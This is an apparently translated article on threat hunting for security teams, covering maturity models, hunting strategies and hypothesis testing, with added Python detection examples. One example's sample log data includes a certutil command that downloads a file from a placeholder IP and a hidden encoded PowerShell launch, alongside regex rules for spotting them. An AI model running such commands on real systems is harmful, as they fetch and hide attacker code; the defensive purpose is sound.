Threat Hunting, or How to Protect Yourself from the 5% of Threats

95% of information security threats are known, and you can protect yourself from them with traditional means such as antivirus, firewalls, IDS and WAF. The remaining 5% of threats are unknown and the most dangerous. They account for 70% of a company's risk because they are very hard to detect, let alone protect against. Examples of such "black swans" are the WannaCry ransomware epidemic, NotPetya/ExPetr, cryptominers, the "cyber weapon" Stuxnet (which hit Iran's nuclear facilities) and many others (does anyone else remember Kido/Conficker?), along with other attacks that classic security measures defend against rather poorly. We want to talk about how to counter these 5% of threats using Threat Hunting technology.

The continuous evolution of cyberattacks demands constant detection and countermeasures, which ultimately leads us to think of an endless arms race between attackers and defenders. Classic security systems are no longer able to provide an acceptable level of security, one at which the level of risk does not affect the company's key indicators (economic, political, reputational) without being adapted to a specific infrastructure, although in general they do cover some of the risks. Already during implementation and configuration, modern security systems find themselves playing catch-up and have to respond to the challenges of a new era.


Threat Hunting technology may be one of the answers to the challenges of our time for an information security professional. The term Threat Hunting (hereafter TH) appeared several years ago. The technology itself is very interesting, but it does not yet have any generally accepted standards and rules. The matter is further complicated by the heterogeneity of information sources and the small number of Russian-language sources on the topic. For this reason, we at LANIT-Integration decided to write a review of this technology.

Relevance

TH technology relies on infrastructure monitoring processes. There are two main scenarios for internal monitoring: Alerting and Hunting. Alerting (similar to MSSP services) is the traditional method of searching for previously developed signatures and signs of attacks and responding to them. This scenario is successfully handled by traditional signature-based protection tools. Hunting (an MDR-type service) is a monitoring method that answers the question "Where do signatures and rules come from?" It is the process of creating correlation rules by analyzing hidden or previously unknown indicators and signs of an attack. Threat Hunting refers to this type of monitoring.

Only by combining both types of monitoring do we get protection that is close to ideal, but there is always some level of residual risk.

[Figure: Protection using two types of monitoring]

And here is why TH (and hunting in its entirety!) will become increasingly necessary:

[Figure: Threats, remedies, risks]

95% of all threats have already been well studied. These include classes such as spam, DDoS, viruses, rootkits and other classic malware. You can protect yourself from these threats with the same classic security measures.

During the implementation of any project, 80% of the work takes 20% of the time to complete, and the remaining 20% of the work takes 80% of the time. Similarly, across the whole threat landscape, the 5% of new threats will account for 70% of a company's risk. In a company where information security management processes are organized, we can manage the 30% of risk from known threats one way or another: by avoiding it (rejecting wireless networks on principle), accepting it (implementing the necessary security measures) or transferring it (for example, onto the shoulders of an integrator). Protecting against zero-day vulnerabilities, APT attacks, phishing, supply chain attacks, cyber espionage and nation-state operations, and a huge number of other attacks is already much harder. The consequences of these 5% of threats will be much more serious (the average loss of a bank to the Buhtrap group is 143 million) than the consequences of spam or viruses, which antivirus software protects against.

Almost everyone has to deal with the 5% of threats. Recently we had to install an open source solution that uses an application from the PEAR (PHP Extension and Application Repository) repository. An attempt to install this application with pear install failed because the site was unavailable (it now shows a stub page), so I had to install it from GitHub. And recently it turned out that PEAR had fallen victim to a supply chain attack.


Do you still remember the attack via CCleaner, or the NotPetya ransomware epidemic delivered through the update module of the MEDoc tax reporting program? Threats are becoming more and more sophisticated, and a natural question arises: "How can we counter these 5% of threats?"

Definition of Threat Hunting

So, Threat Hunting is the process of proactively and iteratively searching for and detecting advanced threats that cannot be detected by traditional security tools. Advanced threats include, for example, APT attacks, attacks on 0-day vulnerabilities, Living off the Land, and so on.

We can also rephrase this: TH is the process of testing hypotheses. It is a manual process with elements of automation, in which the analyst, relying on their knowledge and skills, sifts through large volumes of information in search of signs of compromise that correspond to an initially formulated hypothesis about the presence of a particular threat. Its distinctive feature is the variety of information sources.

It should be noted that Threat Hunting is not some kind of software or hardware product. It is not the alerts that can be seen in some solution. It is not a process of searching for IOCs (Indicators of Compromise). And it is not some kind of passive activity that happens without the participation of information security analysts. Threat Hunting is first and foremost a process.

Components of Threat Hunting

The three main components of Threat Hunting: data, technology, people.

Data (what?), including Big Data. All kinds of traffic flows, information about previous APTs, analytics, user activity data, network data, information from employees, information from the darknet and much more.

Technology (how?) for processing this data: all possible ways of processing it, including Machine Learning.

People (who?): those with extensive experience in analyzing various attacks, developed intuition and the ability to detect an attack. Usually these are information security analysts who must be able to generate hypotheses and find confirmation for them. They are the main link in the process.

The PARIS model

Adam Bateman describes the PARIS model of the ideal TH process. The name alludes to a famous landmark in France. This model can be viewed in two directions: from the top and from the bottom.

As we work our way through the model from the bottom up, we encounter a lot of evidence of malicious activity. Each piece of evidence has a measure called confidence, a characteristic that reflects the weight of that evidence. There is "ironclad" direct evidence of malicious activity, on the basis of which we can immediately reach the top of the pyramid and raise a real alert about a precisely known infection. And there is indirect evidence, whose sum can also lead us to the top of the pyramid. As always, there is far more indirect evidence than direct, which means it has to be sorted and analyzed, additional research has to be carried out, and it is advisable to automate this.

[Figure: The PARIS model]

The upper part of the model (1 and 2) is based on automation technologies and various analytics, and the lower part (3 and 4) is based on people with certain qualifications who manage the process. You can also consider the model from top to bottom: in the upper, blue part we have alerts from traditional security tools (antivirus, EDR, firewall, signatures) with a high degree of confidence and trust, and below them are indicators (IOC, URL, MD5 and others), which have a lower degree of certainty and require additional study. The lowest and thickest level (4) is the generation of hypotheses, the creation of new scenarios for the operation of traditional means of protection. This level is not limited to the sources of hypotheses listed here. The lower the level, the higher the demands placed on the analyst's qualifications.

It is very important that analysts do not just test a finite set of predefined hypotheses, but constantly work on generating new hypotheses and new ways to test them.

TH maturity model

In an ideal world, TH is a continuous process. But since there is no ideal world, let's analyze the maturity model and the methods in terms of the people, processes and technologies involved. Let's consider the model of an ideal, "spherical" TH. There are 5 levels of use of this technology. Let's look at them using the example of the evolution of a single team of analysts.

| Maturity level | People | Processes | Technology |
|---|---|---|---|
| Level 0 | SOC analysts, 24/7 | Classic: a fixed set of alerts, passive monitoring, no TH, working with alerts | Classic tools: IDS, AV, sandboxing, signature analysis tools, Threat Intelligence data |
| Level 1 | SOC analysts; basic forensics knowledge; good knowledge of networks and applications | Experimental: one-off TH, IOC searches, experiments with TH | EDR; partial coverage of data from network devices; tools used only partially |
| Level 2 | Temporary team; average forensics knowledge; excellent knowledge of networks and applications | Periodic: TH sprints (a week per month), temporary TH, regular TH | EDR fully deployed; full automation of EDR data use; partial use of advanced EDR capabilities |
| Level 3 | Dedicated TH team, 24/7; excellent forensics and malware knowledge; excellent knowledge of the offensive side | Preventive: preventive TH, special-case TH; partial ability to test TH hypotheses | Full use of advanced EDR capabilities; full coverage of data from network devices; tools customized to the team's needs |
| Level 4 | Dedicated TH team, 24/7; excellent forensics and malware knowledge; excellent knowledge of the offensive side; research capability | Leading: preventive TH, TH in routine use; full ability to test TH hypotheses; testing, automation and verification of TH hypotheses | Level 3, plus: tight integration of data sources; custom development and non-standard use of APIs |

TH maturity levels by people, processes and technology

Level 0: traditional, without TH. Ordinary analysts work with a standard set of alerts in passive monitoring mode, using standard tools and technologies: IDS, AV, sandbox, signature analysis tools.

Level 1: experimental, trying out TH. The same analysts, with basic knowledge of forensics and good knowledge of networks and applications, can conduct one-off Threat Hunting by searching for indicators of compromise. EDR is added to the toolset, with partial coverage of data from network devices. The tools are only partially used.

Level 2: periodic, temporary TH. The same analysts, who have by now upgraded their knowledge of forensics, networks and the application layer, are required to engage in Threat Hunting regularly (in sprints), say, for a week each month. The toolset gains full coverage of data from network devices, automation of data analysis from EDR, and partial use of advanced EDR capabilities.

Level 3: preventive, frequent TH. Our analysts have organized themselves into a dedicated team and begin to acquire excellent knowledge of forensics and malware, as well as knowledge of the methods and techniques of the attacking side. The process now runs 24/7. The team is able to partially test TH hypotheses while making full use of the advanced capabilities of EDR and full coverage of data from network devices. The analysts are also able to customize the tools to their needs.

Level 4: advanced, routine TH. The same team has acquired the ability to do research, and to generate and automate the process of testing TH hypotheses. The toolset has now been supplemented by close integration of data sources, custom software development to meet the team's needs, and non-standard use of APIs.

Threat Hunting techniques

[Figure: Basic Threat Hunting techniques]

The TH techniques, in order of the maturity of the technology used, are: basic search, statistical analysis, visualization techniques, simple aggregations, machine learning, and Bayesian methods.

The simplest method, basic search, is used to narrow the area of investigation with specific queries. Statistical analysis is used, for example, to describe typical user or network activity in the form of a statistical model. Visualization techniques are used to display data and simplify its analysis in the form of graphs and charts, which make it much easier to spot patterns in a sample. The technique of simple aggregations by key fields is used to optimize search and analysis. The more mature an organization's TH process becomes, the more relevant the use of machine learning algorithms becomes. These are also widely used in spam filtering, detection of malicious traffic and detection of fraudulent activity. A more advanced class of machine learning algorithms is Bayesian methods, which allow classification, reduction of sample size, and topic modeling.
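As an added illustration (not part of the original article), the two simplest techniques above applied to constructed Windows logon events in Python: a simple aggregation (stack) by key fields to surface rare user/host pairs and logon types, and a per-user statistical baseline of logon hour that flags outliers in a new window of events. The event format, the z-score threshold and the one-hour floor on the spread are assumptions of this example.

```python
from collections import Counter
from datetime import datetime
from statistics import mean, pstdev

# Constructed logon events (not real telemetry): (user, host, logon type, timestamp).
# HISTORY is the period the baseline is built from; NEW is the window being hunted.
HISTORY = [
    ("alice", "WS-01", 2, "2019-03-04 08:55:00"),
    ("alice", "WS-01", 2, "2019-03-05 09:10:00"),
    ("alice", "WS-01", 2, "2019-03-06 09:02:00"),
    ("alice", "WS-01", 2, "2019-03-07 08:48:00"),
    ("alice", "WS-01", 2, "2019-03-08 09:15:00"),
    ("alice", "WS-01", 2, "2019-03-11 08:59:00"),
    ("alice", "WS-01", 2, "2019-03-12 09:05:00"),
    ("alice", "WS-01", 2, "2019-03-13 08:51:00"),
    ("bob", "WS-07", 2, "2019-03-04 18:20:00"),
    ("bob", "WS-07", 2, "2019-03-05 19:05:00"),
    ("bob", "WS-07", 2, "2019-03-06 18:40:00"),
    ("bob", "WS-07", 2, "2019-03-07 19:30:00"),
]
NEW = [
    ("alice", "WS-01", 2, "2019-03-14 09:01:00"),   # ordinary
    ("alice", "DC-01", 10, "2019-03-15 03:12:00"),  # night-time remote logon to a new host
    ("bob", "WS-07", 2, "2019-03-14 19:10:00"),     # ordinary
]

def hour_of(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").hour

def stack(events, key):
    """Simple aggregation by key fields: how often each distinct value occurs."""
    return Counter(key(e) for e in events)

def rare(events, key, threshold=1):
    """Long-tail view of a stack: keys seen at most `threshold` times."""
    return sorted(k for k, n in stack(events, key).items() if n <= threshold)

def baseline(events):
    """Per-user statistical model of the typical logon hour: (mean, std dev)."""
    hours = {}
    for user, _host, _ltype, ts in events:
        hours.setdefault(user, []).append(hour_of(ts))
    # Floor the spread at one hour so a perfectly regular user does not divide by zero (assumption).
    return {u: (mean(h), max(pstdev(h), 1.0)) for u, h in hours.items()}

def score(events, model, z_limit=2.0):
    """Flag events whose logon hour is more than z_limit std devs from the user's norm,
    or whose user has no baseline at all. Returns (event, z) pairs; z is None if no baseline."""
    flagged = []
    for e in events:
        user, _host, _ltype, ts = e
        if user not in model:
            flagged.append((e, None))
            continue
        mu, sd = model[user]
        z = (hour_of(ts) - mu) / sd
        if abs(z) > z_limit:
            flagged.append((e, round(z, 2)))
    return flagged

if __name__ == "__main__":
    print("rare user/host pairs:", rare(HISTORY + NEW, lambda e: (e[0], e[1])))
    print("rare logon types:", rare(HISTORY + NEW, lambda e: e[2]))
    for event, z in score(NEW, baseline(HISTORY)):
        print("off-baseline logon:", event, "z =", z)
```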

The Diamond Model and TH strategies

Sergio Caltagirone, Andrew Pendergast and Christopher Betz, in their paper "The Diamond Model of Intrusion Analysis", identified the key components of any malicious activity and the basic relationships between them.

[Figure: The Diamond Model of malicious activity]

According to this model, there are 4 Threat Hunting strategies, each based on one of the key components.

1. Victim-centered strategy. We assume that the victim has adversaries who will deliver "capabilities" by email. We look for traces of the adversary in the mail: links, attachments, and so on. We look for confirmation of this hypothesis over a certain period (a month, two weeks); if we do not find it, the hypothesis did not pan out.

2. Infrastructure-centered strategy. There are several ways to apply this strategy. Depending on access and visibility, some are easier than others. For example, we monitor domain name servers known for hosting malicious domains. Or we set up a process for monitoring all new domain name registrations for a pattern known to be used by the adversary.

3. Capability-centered strategy. Besides the victim-centered strategy used by most network defenders, there is a capability-centered strategy. It is the second most popular and focuses on detecting the adversary's capabilities, namely "malware" and the adversary's ability to use legitimate tools such as psexec, powershell, certutil and others.

4. Adversary-centered strategy. The adversary-centered approach focuses on the adversary itself. This includes the use of open information from publicly available sources (OSINT), collecting data about the adversary, their tactics, techniques and procedures (TTP), analysis of previous incidents, Threat Intelligence data, and so on.
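The capability-centered strategy (3) as a hunt over constructed process-creation events, added here as an example and not taken from the article: each rule encodes one hypothesis about misuse of a legitimate tool the text names (certutil, PowerShell, PsExec), and requiring the command line and the parent process to match together keeps ordinary administrative use out of the results. The event fields, rule patterns and host names are assumptions of this example.

```python
import re

# Constructed process-creation events (not real telemetry): one dict per process start.
EVENTS = [
    {"host": "WS-01", "user": "alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Date"},
    {"host": "WS-03", "user": "svc_backup", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/u.txt u.txt"},
    {"host": "WS-03", "user": "bob", "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBCAEMA"},
    {"host": "WS-09", "user": "SYSTEM", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\PSEXESVC.exe", "cmdline": "PSEXESVC.exe"},
    {"host": "WS-04", "user": "carol", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify cert.cer"},
]

# Each rule is one hypothesis about a legitimate tool being used as an adversary capability.
# The patterns are this example's own, applied case-insensitively; None means "don't care".
RULES = [
    {"name": "certutil fetching content from a URL",
     "image": r"certutil\.exe$", "cmdline": r"-urlcache|https?://", "parent": None},
    {"name": "encoded or hidden PowerShell spawned by an Office application",
     "image": r"powershell\.exe$",
     "cmdline": r"-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden",
     "parent": r"(winword|excel|outlook)\.exe$"},
    {"name": "PsExec service started by the Service Control Manager",
     "image": r"psexesvc\.exe$", "cmdline": None, "parent": r"services\.exe$"},
]

def matches(rule, event):
    """A rule matches only if every pattern it specifies matches the corresponding field."""
    for field in ("image", "cmdline", "parent"):
        pattern = rule[field]
        if pattern is not None and not re.search(pattern, event[field], re.IGNORECASE):
            return False
    return True

def hunt(events, rules=RULES):
    """Run every hypothesis over the events and return the hits, sorted by host and rule."""
    hits = [{"host": e["host"], "user": e["user"], "rule": r["name"], "cmdline": e["cmdline"]}
            for e in events for r in rules if matches(r, e)]
    return sorted(hits, key=lambda h: (h["host"], h["rule"]))

if __name__ == "__main__":
    for h in hunt(EVENTS):
        print(f'{h["host"]:6} {h["user"]:11} {h["rule"]}: {h["cmdline"]}')
```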

Sources of information and hypotheses in TH

[Figure: Some sources of information for Threat Hunting]

There can be many sources of information. An ideal analyst should be able to extract information from everything around them. Typical sources in almost any infrastructure will be data from security tools: DLP, SIEM, IDS/IPS, WAF/FW, EDR. Other typical sources of information are various indicators of compromise, Threat Intelligence services, CERTs and OSINT data. In addition, you can use information from the darknet (for example, an order suddenly appears to break into the mailbox of the head of an organization, or a candidate for a network engineer position has been exposed by their activity there), information obtained by HR (a reference on a candidate from a previous employer), and information from the security service (for example, the results of counterparty verification).

But before using all available sources, you need to have at least one hypothesis.


In order to test hypotheses, they must first be put forward. And in order to put forward many high-quality hypotheses, a systematic approach is needed. The process of generating hypotheses is described in more detail in a separate article; its scheme is very convenient to take as the basis for a hypothesis-generation process.

The main source of hypotheses will be the ATT&CK matrix (Adversarial Tactics, Techniques and Common Knowledge). It is, in essence, a knowledge base and a model for describing the behavior of attackers who carry out their activities in the final stages of an attack, usually described using the Kill Chain concept. That is, the stages after the attacker has penetrated the enterprise's internal network or a mobile device. The knowledge base originally included descriptions of 121 tactics and techniques used in attacks, each described in detail in Wiki format. Various Threat Intelligence reports are also well suited as a source for generating hypotheses. Of particular value are the results of infrastructure analysis and penetration tests: this is the most valuable data, which can give us ironclad hypotheses because they are based on a specific infrastructure with its specific shortcomings.

The hypothesis testing process

Sergei Soldatov presented a good diagram with a detailed description of the process, illustrating how TH hypotheses are tested within a single system. I will outline the main stages with a brief description.


Stage 1: TI farm

At this stage, objects must be singled out (by analyzing them together with all the threat data) and assigned labels for their characteristics. The objects are files, URLs, MD5 hashes, processes, utilities, events. When passing them through Threat Intelligence systems, tags must be attached to them. That is: this site was seen as a C&C in such and such a year, this MD5 was associated with such and such malware, this MD5 was downloaded from a site that distributed malware.

Stage 2: Cases

At the second stage, we look at the interactions between these objects and identify the relationships among all of them. We obtain labeled systems that are doing something bad.

Stage 3: Analyst

At the third stage, the case is handed to an analyst with extensive experience in analysis, who delivers a verdict. They dissect, down to the bytes, what this code does, where, how, why and to what end. This body was malware; this computer was infected. They uncover the connections between objects and check the results of running the samples through the sandbox.

The results of the analyst's work are passed on. Digital Forensics examines disk images, Malware Analysis examines the "bodies" that were found, and the Incident Response team can go on site and investigate what is already there. The outcome of the work is a confirmed hypothesis, an identified attack and ways to counter it.
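The three stages above, together with the PARIS idea that direct evidence reaches the top of the pyramid on its own while indirect evidence has to accumulate, as one added Python example (not Sergei Soldatov's diagram or any vendor's code): stage 1 labels observed objects from a constructed TI farm, stage 2 links them per host into scored cases, and only cases over a threshold are queued for the stage 3 analyst. The tag weights, the noisy-OR combination and the escalation threshold are assumptions of this example.

```python
# Stage 1 input: a constructed Threat Intelligence "farm" of tagged objects (not real indicators).
TI_FARM = {
    ("md5", "0123456789abcdef0123456789abcdef"): {"malware:example-rat", "seen:2018"},
    ("url", "http://c2.example/gate.php"): {"c2:2017"},
    ("url", "http://dl.example/setup.exe"): {"distribution:2018"},
}

# Weight of each tag family: a known malware body is direct evidence, the rest is indirect.
# These weights are this example's assumptions, not values from the article.
TAG_CONFIDENCE = {"malware": 0.9, "c2": 0.5, "distribution": 0.35, "seen": 0.0}

# Constructed EDR/proxy observations (not real telemetry): (host, object type, object value).
OBSERVATIONS = [
    ("WS-11", "md5", "0123456789abcdef0123456789abcdef"),
    ("WS-11", "url", "http://c2.example/gate.php"),
    ("WS-12", "url", "http://c2.example/gate.php"),
    ("WS-12", "url", "http://dl.example/setup.exe"),
    ("WS-13", "url", "http://intranet.example/"),
]

def enrich(observations, farm):
    """Stage 1 (TI farm): label every observed object with the tags the farm knows for it."""
    return [(host, kind, value, farm.get((kind, value), set()))
            for host, kind, value in observations]

def tag_confidence(tag):
    """Confidence contributed by one tag, keyed on its family (the part before the colon)."""
    return TAG_CONFIDENCE.get(tag.split(":", 1)[0], 0.0)

def build_cases(enriched, escalate_at=0.8):
    """Stage 2 (cases): link the tagged objects seen on one host and score the host.
    Confidences combine as noisy-OR, 1 - prod(1 - c), so several indirect indicators
    add up while a single direct one clears the threshold by itself."""
    cases = {}
    for host, kind, value, tags in enriched:
        if not tags:
            continue  # nothing the farm knows about; not evidence on its own
        case = cases.setdefault(host, {"host": host, "evidence": []})
        case["evidence"].append((kind, value, sorted(tags), max(map(tag_confidence, tags))))
    for case in cases.values():
        miss = 1.0
        for *_, confidence in case["evidence"]:
            miss *= 1.0 - confidence
        case["score"] = round(1.0 - miss, 3)
        case["escalate"] = case["score"] >= escalate_at
    return sorted(cases.values(), key=lambda c: -c["score"])

def analyst_queue(cases):
    """Stage 3 (analyst): only cases over the threshold go to a human for a verdict;
    the rest wait for more evidence."""
    return [c["host"] for c in cases if c["escalate"]]

if __name__ == "__main__":
    cases = build_cases(enrich(OBSERVATIONS, TI_FARM))
    for c in cases:
        print(c["host"], c["score"], "escalate" if c["escalate"] else "needs more evidence")
        for kind, value, tags, conf in c["evidence"]:
            print("   ", kind, value, tags, conf)
    print("to analyst:", analyst_queue(cases))
```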


Conclusions

Threat Hunting is a fairly young technology that can effectively counter custom, new and non-standard threats, and it has great prospects given the growing number of such threats and the growing complexity of corporate infrastructure. It requires three components: data, tools and analysts. The benefits of Threat Hunting are not limited to preventing threats from materializing. Don't forget that during the hunt we dive into our infrastructure and its weak points with the eyes of a security analyst, and can strengthen those points further.

In our opinion, these are the first steps to take to start a TH process in your organization.

  1. Take care of endpoint and network infrastructure protection. Ensure visibility (NetFlow) and control (firewall, IDS, IPS, DLP) of all processes on your network. Know your network from the edge router to the last host.
  2. Study MITRE ATT&CK.
  3. Conduct regular pentests of at least your key external resources, analyze the results, identify the main targets of attack and close their vulnerabilities.
  4. Deploy an open source Threat Intelligence system (for example, MISP or Yeti) and analyze logs in conjunction with it.
  5. Deploy an incident response platform (IRP): R-Vision IRP, TheHive, and a sandbox for analyzing suspicious files (FortiSandbox, Cuckoo).
  6. Automate routine processes. Log analysis, incident recording and staff notification are a huge field for automation.
  7. Learn to interact effectively with engineers, developers and technical support to work on incidents together.
  8. Document the whole process, the key points and the results achieved, so you can return to them later or share this data with colleagues.
  9. Be socially aware: know what is happening with your employees, whom you hire, and to whom you grant access to the organization's information resources.
  10. Stay up to date with trends in new threats and protection methods, raise your level of technical literacy (including how IT services and subsystems work), attend conferences and talk to colleagues.

We are ready to discuss how to organize a TH process in the comments.

Or come and work with us!

Sources and learning materials

Source: www.habr.com
